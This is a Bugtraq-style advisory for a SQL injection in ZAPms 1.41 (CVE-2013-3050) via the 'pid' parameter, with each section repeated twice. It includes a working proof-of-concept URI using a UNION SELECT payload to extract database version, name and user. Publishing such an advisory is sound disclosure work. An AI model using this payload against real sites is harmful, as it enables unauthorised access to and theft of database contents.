ZAPms 'pid' Parameter SQL Injection Vulnerability
BID:58960
Info
ZAPms 'pid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 58960 |
| Class: | Input Validation Error |
| CVE: |
CVE-2013-3050 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 09 2013 12:00AM |
| Updated: | Apr 17 2013 12:59PM |
| Credit: | NoGe |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
ZAPms 'pid' Parameter SQL Injection Vulnerability
ZAPms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ZAPms 1.41 is vulnerable; other versions may also be affected.
ZAPms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ZAPms 1.41 is vulnerable; other versions may also be affected.
Exploit / POC
ZAPms 'pid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
Solution / Fix
ZAPms 'pid' Parameter SQL Injection Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].